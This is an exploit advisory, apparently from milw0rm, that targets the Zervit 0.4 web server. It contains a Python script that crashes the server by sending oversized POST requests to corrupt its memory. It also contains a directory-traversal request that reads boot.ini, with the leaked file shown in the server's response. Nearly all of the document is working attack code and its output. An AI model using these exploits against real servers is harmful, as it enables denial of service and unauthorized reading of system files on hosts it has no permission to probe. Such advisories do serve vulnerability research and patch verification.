####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
By: e.wiZz! & shinnai
Site: shinnai.net & balcansecurity.com
[Memory Corruption]
########################################################################
import socket
host = "127.0.0.1"
port = 8080
try:
for i in range(1,10):
buff = "a" * 3330
request = "POST " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
[Directory traversal]
#################################################################################
[Request]
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################
[Response]
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
# milw0rm.com [2009-05-13]
